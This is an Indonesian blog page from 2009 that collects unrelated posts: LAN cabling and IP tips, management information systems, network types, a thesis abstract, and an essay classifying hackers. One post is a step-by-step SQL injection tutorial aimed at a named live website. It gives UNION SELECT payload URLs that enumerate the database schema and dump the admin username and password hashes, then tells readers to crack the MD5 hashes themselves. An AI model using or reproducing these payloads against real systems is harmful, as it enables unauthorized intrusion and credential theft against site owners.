Kamis, 03 Desember 2009

Tips Mebangun LAN

Untuk membuat sebuah jaringan komputer kecil (LAN), ada beberapa peralatan dan bahan yang kita butuhkan seperti :
- Tang Cramping
- Lan Tester
- Kabel UTP (Unshielded Twisted Pair) / Coaxial (jarang digunakan)
- Connector RJ45 / connector kabel coaxial
- switch-hub
- min 2 buah PC (Personal Computer) beserta LAN Card atau NIC (Network Interface Card)


Lalu kita tentukan susunan kabel UTP yang akan kita gunakan sesuai dengan fungsinya. misalkan kalau kita hendak menghubungkan langsung dari PC-PC maka kita gunakan CROSS, kalau kita hubungkan ke switch-hub lebih dulu, PC-HUB, maka kita gunakan STRAIGHT. jika kita hendak menghubungkan 2 LAN maka HUB-HUB kita gunakan CROSS, kita juga bisa gunakan STARIGHT jika pada salah satu HUB terdapat port uplink.

untuk memudahkan dalam menghapal susunan kabel, kita bisa gunakan slah satu cara yang saya pakai, yaitu STRAIGHT -> OBHC kalau CROSS -> HBOC.
STRAIGHT -> OBHC
O -> putih orange - orange
B -> putih hijau - biru
H -> putih biru - hijau
C -> putih coklat - coklat

CROSS -> HBOC
H -> putih hijau - hijau
B -> putih orange - biru
O -> putih biru - orange
C -> putih coklat - coklat

jika anda memiliki cara yang lain silahkan diterapkan, gak harus seperti diatas.
kemudian silahkan setiap ujungnya diujicoba menggunakan lan tester.
kalau lampu menyala sesuai yang diharapkan, maka anda telah berhasil dalam proses cramping. silahkan dipasang pada lan card PC anda.

untuk mengatur IP maka yang kita pikirkan adalah berapa no group IP yang digunakan pada LAN anda. biasanya untuk jaringan lokal menggunakan group IP 172.17.X.X, 192.168.X.X 202.168.X.X atau 10.10.X.X.
untuk jaringan lokal, minimal yang diatur adalah :
IP address : 192.168.1.2 (misal)
Subnet mask : 255.255.255.0 (misal)

untuk default gateway dapat anda isi jika anda hendak menghubungkan jaringan lokal anda dengan jaringan luar (baik jaringan lokal lainnya atau internet).

untuk DNS server akan anda isi jika anda terhubung dengan internet. DNS server ini tergantung dengan aturan yang ditetapkan oleh provider, Telkom Speedy, dll.

jika anda sudah mengatur no IP, anda bisa mengecek apakah komputer anda sudah bisa berkomunikasi dengan komputer lainnya, yaitu dengan cara menjalankan perintah ping pada command, seperti ping 192.168.1.3 (perintah ini menghasilkan 4 kali respon), agar terus-menerus memberikan respon kita tambahkan atribut -t (trace), seperti ping 192.168.1.3 -t
Respon yang diberikan ada 3 macam :
1. reply from.......
- komputer anda sudah dapat berkomunikasi dengan komputer tujuan anda.
2. request time out.......
- koneksi jaringan ada masalah dengan komputer tujuan anda.
3. destination unreachable.......
- koneksi jaringan komputer anda ada masalah.

Sistem Informasi Manajemen

Sistem Informasi Manajemen merupakan sistem informasi yang menghasilkan hasil keluaran (output) dengan menggunakan masukan (input) dan berbagai proses yang diperlukan untuk memenuhi tujuan tertentu dalam suatu kegiatan manajemen.


Tujuan Umum

  • Menyediakan informasi yang dipergunakan di dalam perhitungan harga pokok jasa, produk, dan tujuan lain yang diinginkan manajemen.
  • Menyediakan informasi yang dipergunakan dalam perencanaan, pengendalian, pengevaluasian, dan perbaikan berkelanjutan.
  • Menyediakan informasi untuk pengambilan keputusan.

Ketiga tujuan tersebut menunjukkan bahwa manajer dan pengguna lainnya perlu memiliki akses ke informasi akuntansi manajemen dan mengetahui bagaimana cara menggunakannya. Informasi akuntansi manajemen dapat membantu mereka mengidentifikasi suatu masalah, menyelesaikan masalah, dan mengevaluasi kinerja (informasi akuntansi dibutuhkan dam dipergunakan dalam semua tahap manajemen, termasuk perencanaan, pengendalian dan pengambilan keputusan).


Proses Manajemen

Proses manajemen didefinisikan sebagai aktivitas-aktivitas:

  • Perencanaan, formulasi terinci untuk mencapai suatu tujuan akhir tertentu adalah aktivitas manajemen yang disebut perencanaan. Oleh karenanya, perencanaan mensyaratkan penetapan tujuan dan identifikasi metode untuk mencapai tujuan tersebut.
  • Pengendalian, perencanaan hanyalah setengah dari peretempuran. Setelah suatu rencana dibuat, rencana tersebut harus diimplementasikan, dan manajer serta pekerja harus memonitor pelaksanaannya untuk memastikan rencana tersebut berjalan sebagaimana mestinya. Aktivitas manajerial untuk memonitor pelaksanaan rencana dan melakukan tindakan korektif sesuai kebutuhan, disebut kebutuhan.
  • Pengambilan Keputusan, proses pemilihan diantara berbagai alternative disebut dengan proses pengambilan keputusan. Fungsi manajerial ini merupakan jalinan antara perencanaan dan pengendalian. Manajer harus memilih diantara beberapa tujuan dan metode untuk melaksanakan tujuan yang dipilih. Hanya satu dari beberapa rencana yang dapat dipilih. Komentar serupa dapat dibuat berkenaan dengan fungsi pengendalian.


Bagian

SIM merupakan kumpulan dari sistem informasi:

  • Sistem informasi akuntansi (accounting information systems), menyediakan informasi dan transaksi keuangan.
  • Sistem informasi pemasaran (marketing information systems), menyediakan informasi untuk penjualan, promosi penjualan, kegiatan-kegiatan pemasaran, kegiatan-kegiatan penelitian pasar dan lain sebagainya yang berhubungan dengan pemasaran.
  • Sistem informasi manajemen persediaan (inventory management information systems).
  • Sistem informasi personalia (personal information systems).
  • Sistem informasi distribusi (distribution information systems).
  • Sistem informasi pembelian (purchasing information systems).
  • Sistem informasi kekayaan (treasury information systems).
  • Sistem informasi analisis kredit (credit analysis information systems).
  • Sistem informasi penelitian dan pengembangan (research and development information systems).
  • Sistem informasi analisis software
  • Sistem informasi teknik (engineering information systems).

Jangkauan Aren Jaringan Komputer

Berdasarkan wilayahnya atau letak geografisnya, jaringan komputer dibedakan menjadi 3:

1. Local Area Network (LAN)

LAN menggambarkan suatu jaringan yang menjangkau area yang terbatas, misalnya satu kantor satu gedung, di mana komputer yang mempunyai jaringan fisik berdekatan atau dengan lainnya. Biasanya antarnode tidak jauh dari sekitar 200 m.

2. Metropolitan Area Network (MAN)

MAN merupakan jaringan dengan area lebih luas dari LAN, yang bisa terdiri dari dua atau lebih LAN yang dihubungkan bersama-sama dalam batas-batas kira-kira suatu kawasan metropolitan atau satu kota. Jarak maksimum yang dijangkau MAN kira-kira 80 kilometer.

3. Wide Area Network (WAN)

WAN adalah jaringan yang jangkauan area geografik paling luas, bisa antarpulau, Negara, benua, bahkan bisa keluar angkasa. WAN biasanya sudah menggunakan media wireless, sarana satelit, ataupun kabel serat optic, karena jangkauannya yang lebih luas. Contoh terbaik dan sangat terkenal adalah Internet.

Interkoneksi berdasarkan jarak antarnode

Jarak antarkomputer

Lokasi/Area

Jenis Jaringan

1 – 10 m

Ruangan

Local Area Network

100 m - <1>

Gedung perkantoran

1 – 10 km

Kota

Metropolitan Area Network

> 10 - <>

Kabupaten, Propinsi

> = 100 km

Negara

Wide Area Network

> = 1.000 km

Benua

> = 10.000 km

Planet

Internet

Fungsi Komputer Dalam jaringan

1. Jaringan Client-Server

Dalam jaringan ini satu komputer berfungsi sebagai pusat layanan (server) dan komputer yang lain berfungsi meminta pelayanan (Client). Sesuai dengan namanya, client/server berarti adanya pembagian kerja pengolahan data antara client dan server. Saat ini, sebagian besar jaringan menggunakan model client/server.

a. Client

Client adalah sebuah sistem komputer atau proses yang meminta sebuah layanan dari sistem komputer atau proses lain. Workstation yang meminta isi dari sebuah file dari server file disebut sebagai client dari file server tersebut.

b. Server

Server bertugas menerima request dari client, mengolahnya, dan mengirimkan kembali hasilnya ke client (Aji Supriyanto, 2005: 296).

Komputer server harus mampu melayani:

1) Request secara simultan dalam jumlah besar.

2) Aktivitas manajemen jaringan.

3) Menjamin keamanan pada sumber jaringan.

Komputer server dalam pelayanannya dibedakan menjadi dua yaitu:

1) Non-dedicated server adalah server yang selain berfungsi sebagai server itu sendiri juga berfungsi sebagai client.

2) Dedicated server adalah server yang memang tugasnya hanya melakukan pelayanan.

2. Jaringan Peer-to-Peer

Dalam jaringan ini tidak ada komputer yang berfungsi khusus, dan semua komputer dapat berfungsi sebagai klien dan server dalam satu saat yang bersamaan.


Perbandingan Peer-to-Peer dengan Client/Server

Peer-to-Peer

Client/Server

Keuntungan

Keuntungan

  • Tidak membutuhkan software server NOS (Network Operating System)
  • Tidak membutuhkan administrator jaringan yang andal
  • Lebih mudah pengaturannya bila jaringannya besar karena administrasinnya disentralkan
  • Semua data dapat di-back up pada satu lokasi sentral

Kerugian

Kerugian

  • Tiap pengguna harus dilatih untuk menjalankan tugas administratif
  • Keamanan kurang
  • Tidak cocok jaringan skala besar.
  • Membutuhkan software NOS
  • Hardware yang lebih tinggi dan mahal
  • Butuh administrator professional


Jaringan Komputer

Jaringan komputer adalah kumpulan dua atau lebih komputer yang saling berhubungan untuk melakukan komunikasi data. Komunikasi data yang bisa dilakukan melalui jaringan komputer dapat berupa data teks, gambar, video, dan suara. Untuk membangun sebuah jaringan komputer harus diperhatikan tentang situasi dan kondisi organisasi yang akan membangun jaringan tersebut, misalnya struktur bangunan, jangkauan, kecepatan akses, biaya operasional, dan sebagainya.

Sekumpulan komputer dinamakan sebagai jaringan komputer (Computer Network) jika dalam sekumpulan komputer tersebut dihubungkan melalui media fisik dan software yang memfasilitasi komunikasi antara komputer-komputer tersebut. Sehingga memungkinkan pengguna komputer dalam jaringan komputer dapat saling bertukar file/data, mencetak pada printer yang sama dan menggunakan hardware/software yang terhubung dalam jaringan secara bersama-sama.

RANCANG BANGUN SISTEM INFORMASI PELAPORAN

Abstrak - Armada penjualan merupakan inti dari sebuah kegiatan pemasaran perusahaan.
Medical Representative adalah nama yang biasa digunakan untuk menyebut armada penjualan di
perusahaan farmasi, begitu pula dengan PT. Kalbe Farma. Kalbe menggunakan pembagian daerah
kerja berdasar region-region yang di dalamnya terdapat tiga sampai empat Medical Representative
dengan seorang supervisor sebagai pimpinannya. Saat ini pengukuran kinerja Medical Representative
masih dilakukan secara kolektif tiap region. Tugas Akhir ini bertujuan merancang dan membangun
sebuah sistem pengukuran kinerja Medical Representative yang dapat dimanfaatkan untuk
mengevaluasi kinerja Medical Representative secara personal. Manfaat yang didapat dari Tugas Akhir
ini adalah menyajikan detail seluruh hasil kerja seorang Medical Representative dalam sebuah sistem
yang terintegrasi sekaligus menjadi alat monitoring penjualan dan pemasaran yang nantinya dapat
digunakan pihak manajemen untuk mengambil keputusan strategis pemasaran.
Penelitian diawali dengan analisa terhadap kebutuhan informasi sistem yang didapat dari
survey dan wawancara. Identifikasi kebutuhan dan desain sistem didefinisikan dengan menggunakan
UML dan ERD. Pengembangan perangat lunak dikembangkan dengan berbasis web dengan
menggunakan JSP, MySQL sebagai basis data, dan Tomcat sebagai web server. Uji coba dilakukan
dengan melakukan pengambilan contoh dari setiap fungsi untuk mengevaluasi data masukan, dan
kevalidan hasil evaluasi kinerja Medical Representative yang telah dilakukan.
Tugas Akhir ini menghasilkan aplikasi yang dapat menilai kinerja Medical Representative,
melalui proses pembandingan antara hasil kerja Medical Represntative dengan parameter yang talah
ditetapkan oleh pihak manajemen, fleksibilitas dalam hal perubahan bobot tiap parameter memberikan
informasi secara detail sekaligus dinamis terhadap kinerja Medical Representative.

Download Lengkap

Contoh SQL Injection

to the point.. talk less do more

target site:

http://www.itmaasia.com/news.php?id=10

udahnya kita test apakah target kita bisa di SQLi ato gk??
caranya cukup kasih tanda ( ' ) / petik satu dibelakang url jadinya

http://www.itmaasia.com/news.php?id=10'

klo keluar tulisan error sql berarti webnya bisa di SQLi.

langkah berikutnya kita cari jumlah kolom. caranya make syntak

order by (jumlah kolom)--

kita terapkan pada site target jadinya

http://www.itmaasia.com/news.php?id=10 order by 300--

kalo ada tulisan :

Unknown column '300' in 'order clause'

itu berarti kolomnya kebanyakan kita pake ilmu ngira" jumlah kolomnya brp? harus pas misal kita kira² target kita punya kolom 26 sehingga

http://www.itmaasia.com/news.php?id=10 order by 26--

error tadi gk keluar.. kita coba lagi make kolom 27

http://www.itmaasia.com/news.php?id=10 order by 27--

dan lagi error gk kluar?? kita coba lagi make kolom 28

http://www.itmaasia.com/news.php?id=10 order by 28--

ternyata error keluar.. jadi kesimpulannya.. target kita tuh pny kolom 27 buah..

setelah kita dapet semua kolom kita urutkan kolom untuk mendapatkan "NOMOR AJAIB" caranya make syntak

depan id kasih tanda ( - )/kurang union select kolom1,2, n

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

maka akan muncul "NOMOR AJAIB" itulah nomor yang kita gunakan untuk inject (oh iya, nomor ajaib ini tidak hanya di badan web, tetapi bisa di title web)

di target kita ngeluarin angka 3 & 11

selanjutnya kita cari versi databasenya.. caranya make syntak

@@Version pada nomor ajaib

penerapan dalam target kita (gw ambil yg 11)

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,@@Version,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

muncul versi database
5.0.51b-community-nt

[quote]
catatan:
database versi 5, karena sebentar kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat di database versi 4, jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya.[/quote]

langkah selanjutnya kita cari informasi table caranya

memasukkan perintah group_concat(table_name) didalam "angka ajaib" kemudian diakhir URL tambahkan from information_schema.tables where table_schema=database()--

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.tables%20where%20table_schema=database()--

nah muncul kan nama² tabel nya ada tabel admin tuh

langkah selanjutnya kita akan mengintip informasi di dalam table admin,

pertama cek column dulu di table admin dengan perintah group_concat(column_name) dan diakhir URL tambahkan from information_schema.columns where table_name='nama table'

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns where table_name='tb_admin'--

oopppsss... error!
table 'admin' harus diconvert dulu ke hexa agar dapat dibaca oleh SQL..
dengan catatan, kita harus menambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert ke hexa..

caranya masuk ke web ini
http://www.swingnote.com/tools/texttohex.php

trus di kolom string tulis tb_admin kemudian convert
kemudian copy hexnya. lalu kita terapkan pada target kita

http://www.itmaasia.com/news.php?id=-10%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.columns%20where%20table_name=0x74625f61646d696e

keluarkan informasi dari tb_admin..
langkah selanjutnya kita cari id_admin & password caranya

group_concat(username,0x3a,password) tambahkan diakhir URL from admin

dimana 0x3a adalah tanda : yang telah diconvert ke hexa, agar format tampilannya username:password, dan command from admin adalah untuk menjalankan perintah untuk mengambil informasi dari table yang bernama admin..

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(username,0x3a,password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tb_admin

wakakakakkak... dapet dech informasi login admin dan passwordnya..
sekarang kita akan login sebagai admin, namun user admin telah terenkripsi dengan MD5. cari dah cracknya......

selanjutnya terserah anda..

segala akibat ditanggung sendiri"..


Sumber Tecon Indonesia

HACK Definition

1. DEFINISI HACKING

2. PROFILE HACKER
3. ATTACKER
4. TIGA KELOMPOK HACKER BERDASARKAN MOTIF
5. TUJUH KELOMPOK HACKER BERDASARKAN PROFIL KEMAMPUAN

1. DEFINISI HACKING
Apakah yang dimaksud dengan hacking? Definisi paling jelas dan lengkap dari hacking ini, dapat Anda jumpai sebagaimana diungkapkan oleh Zackary dalam white paper-nya yang berjudul “Basic of Hacking” yang dimuat di Sans. ‘Hacking’ merupakan aktivitas penyusupan ke dalam sebuah sistem komputer ataupun jaringan dengan tujuan untuk menyalahgunakan ataupun merusak sistem yang ada.
Definisi dari kata “menyalahgunakan” memiliki arti yang sangat luas, dan dapat diartikan sebagai pencurian data rahasia, serta penggunaan e-mail yang tidak semestinya seperti spamming ataupun mencari celah jaringan yang memungkinkan untuk dimasuki.
Saat ini, marak sekali orang yang memiliki keanehan dengan keisengan mencoba-coba ketangguhan sistem pengaman jaringan sebuah perusahaan ataupun pribadi. Beberapa diantaranya memang memiliki tujuan mulia, yakni mengasah kemampuan mereka di bidang teknologi pengamanan jaringan dan biasanya setelah mereka berhasil menerobos sistem keamanan yang ada, mereka dengan kerelaan hati menginformasikan celah pengamanan yang ada kepada yang bersangkutan untuk disempurnakan. Namun ada juga yang benar-benar murni karena iseng ditunjang oleh motif dendam ataupun niat jahat ingin mencuri sesuatu yang berharga.
Satu hal yang harus dipahami di sini bahwa apapun alasannya ‘hacking’ adalah melangar hukum, dan tidak ada aturan di manapun di dunia yang membenarkan tindakan ini. Namun, realita yang berjalan di kondisi saat ini adalah tidak ada jaminan apapun yang dapat memastikan bahwa tidak ada celah atapun kelemahan dalam sistem jaringan ataupun komputer kita dengan menggunakan sistem operasi apapun. Artinya, cukup jelas tidak ada sistem jaringan yang benar-benar cukup aman yang mampu menjamin 100% tingkat keamanan data dan informasi yang ada di dalamnya. Kondisi ini yang justru memicu maraknya aktivitas hacking dalam berbagai skala dan tingkat aktivitas, mulai level sekedar iseng hingga professional. Hal terpenting yang bisa kita lakukan saat ini hanyalah memastikan bahwa semua celah keamanan telah tertutupi dan kondisi siaga senantiasa diperlakukan.

2. PROFILE HACKER
Hacker terbagi menjadi dua kelompok besar, yaitu hacker sendiri dan dan attacker/cracker. Di masyarakat awam, banyak sekali terjadi salah pengertian tentang hal ini. Orang cenderung menganggap hacker adalah orang jahat yang suka menjahili komputer ataupun sistem milik orang lain, benarkah seperti itu?
Berdasarkan karakteristiknya secara garis besar, perilakuk hacking terbagi menjadi dua kelompok, yaitu hacker sendiri, yakni orang yang memiliki hobi untuk mengutak-atik isi komputer orang lain/dirinya sendiri dengan tujuan untuk memahami bagaimanakah proses bekerjanya sebuah sistem.
Kebalikan dari hacker adalah attacker/cracker, yakni hacker yang memiliki aktivitas sama namun tujuan yang bertolak belakang, yakni menyalahgunakan ataupun untuk suatu tujuan ataupun kepentingan tertentu dan di luar tujuan untuk memahami sebuah sistem bekerja.

3. ATTACKER

* Outside attacker
Para attacker yang berasal dari luar komunitas sistem jaringan Anda dan melakukan berbagai aktivitas destruktif, dengan menginfiltrasi berbagai sistem jaringan maupun aplikasi yang ada dari luar komunitas.
Contoh, melakukan defacing terhadap situs web dan spamming e-mail server.
Outsiders mencoba membongkar firewall jaringan dalam rangka merusak sistem jaringan internal yang ada di dalam komunitas, dan jalan yang dipergunakan melalui internet, dial-up lines, masuk secara paksa ataupun memanfaatkan jaringan partner yang terhubung dengan komunitas, seperti vendor, customer, ataupun rekanan bisnis.

* Inside attacker
Para attacker yang berasal dari kalangan komunitas itu sendiri dan memiliki hak akses terhadap sistem jaringan internel yang ada, namun menyalahgunakannya ataupun memanfaatkannya dengan melebihkan hak penggunaan sewajarnya yang seharusnya dimiliki. Sebagai contoh, seorang karyawan bagian teller umumnya memiliki priviledge sebagai user, namun setelah infiltrasi ia dapat mengubah berbagai sistem konfigurasi yang ada layaknya seorang administrator.
Insider attack mendominasi berbagai macam aktivitas destruktif yang ada dalam kategori hacking hingga mencapai jumlah 80%. Hal ini dimungkinkan karena faktor aksesibiliti yang dimilikinya mampu untuk melakukan hal tersebut. Di komunitas internet, upaya untuk menjelaskan bahwa hacker bukanlah attacker bukanlah hal yang baru. Namun, upaya ini kurang begitu berhasil karena faktor persepsi yang melekat terutama di kalangan netter baru.

4. TIGA KELOMPOK HACKER BERDASARKAN MOTIF

* Black Hat
Para attacker yang menggunakan kemampuannya untuk tujuan kriminal dan cenderung membahayakan kepentingan pihak lain. Pada umumnya orang-orang yang tergabung dalam kelompok ini adalah yang bergerak secara individu atau sesuai idealisme tertentu dan tidak terikat atas kepentingan pihak tertentu.

* Grey Hat
Para hacker yang memberikan informasi yang diperoleh ke para attacker maupun para vendor, untuk memperoleh imbalan tertentu. Kelompok ini dikenal juga sebagai cracker, yakni orang-orang yang tidak memiliki keberpihakan pada pihak manapun dan menjual berbagai informasi yang diperlukan sesuai kebutuhan yang ada.

* White Hat (hacker sejati)
Orang-orang yang melakukan aktivitas hacking dalam rangka memperoleh informasi tentang celah-celah keamanan, maupun kelemahan-kelemahan yang dimiliki untuk diberikan kembali kepada pihak yang bersangkutan untuk disempurnakan kembali.

5. TUJUH KELOMPOK HACKER BERDASARKAN PROFILE KEMAMPUAN
Pembagian para hacker berdasarkan profile kemampuan profesionalnya terbagi menjadi tujuh kelompok. Hal ini sebagaimana dijelaskan oleh Marc Rogers MA, seorang guru besar psikologi dari University of Manitoba Hawai, yakni:

* Tool Kids/NewBies
Orang-orang yang baru belajar aktivitas hacking, namun kemampuan kemampuan tentang komputer serta teknik pemrograman relatif terbatas dan hanya baru bisa membuat program-program dasar. Aktivitas hacking yang dilakukan, umumnya menggunakan bantuan aplikasi yang terdapat di internet hingga tidak murni mengandalkan kemampuan individunya.

* Cyber Punk
Orang-orang yang memiliki pengetahuan dan teknik komputer yang lebih tinggi dibandingkan NewBies. Mereka sudah mampu memahami karakteristik dari sistem jaringan ataupun sistem yang sedang mereka serang. Pengetahuan mereka tentang bahasa pemrograman cukup andal, karena mampu mendefinisikan hingga karakteristik umumnya. Dengan kemampuannya ini, ia sudah mampu menciptakan alat bantu infiltrasi sendiri, hingga tidak lagi menggunakan program-program bantu yang tersedia di internet. Aktivitas-aktivitas yang dilakukan memiliki kecenderungan untuk kriminal, seperti defacing web, carding, ataupun spamming.

* Internals
Orang-orang yang masih bergabung ataupun pernah (mantan) dengan perusahaan TI, dengan kemampuan komputer dan programming yang anda. Dan melakukan berbagai aktivitas hacking dengan mengandalkan berbagai kombinasi sumber daya internal maupun eksternal yang ada untuk berbagai tujuan. Contoh, pelanggaran paling sering dilakukan adalah breaking over priviledge activity, yakni segala aktivitas yang melanggar batasan-batasan hak yang dimiliki.

* Coders
Golongan ini dikenal juga sebagai resources, yakni orang-orang yang menjual berbagai informasi yang ada di internet ke pihak-pihak yang membutuhkan. Kemampuan programming dan teknisnya sangat andal dan kelompok ini malakukan berbagai aktivitas infiltrasi dalam rangka untuk memperoleh berbagai data ataupun informasi yang dapat dijual. Coders juga membantu membuat berbagai aplikasi bantu hacking yang dibutuhkan oleh para hacker ataupun attacker/cracker yang membutuhkan.

* Old Guard Hackers (Idealism Gate Keepers)
Para hacker sejati yang murni melakukan aktivitas-kativitas hacking dalam rangka untuk tujuan ilmiah dan kebaikan semua pihak. Jumlah golongan ini relatif sangat sedikit, karena idealisme yang dijunjung memaksa mereka untuk menggunakan kode etik yang dijunjung tinggi oleh para hacker, yakni kemampuan di atas segalanya.

* Professional Criminals
Para attacker/cracker yang bergerak atas nama kelompok ataupun individu dan melakukan berbagai aktivitas cyber crime sebagai sumber kehidupan utamanya. Kemampuan yang dimiliki oleh kelompok ini sangat sempurna karena mengombinasikan berbagai piranti keras dan pengetahuan programming yang bisa diandalkan dibantu data/informasi yang diperoleh dari Coders. Aktivitas kejahatan yang dilakukan tidak lagi dalam kelas cyber punk yang lebih banyak pada target individu, namun justru pada kalangan korporat dengan jalan merampok dana yang tersedia dengan melakukan transfer secara tersembunyi.

* Cyber Terrorist
Sekolompok orang atau individu yang bertindak atas dasar sentimen pada suatu kelompok atau pihak tertentu, dan melakukan berbagai aktivitas yang bertujuan untuk menunjukkan eksistensi mereka pada lingkungan dunia. Tingkatan kemampuan yang dimiliki kelompok ini adalah yang tertinggi karena menggabungkan berbagai sumber daya yang ada, level kemampuan, bahkan menggunakan sarana prasarana bantuan dari pihak sponsor yang membantu seperti satelit komunikasi.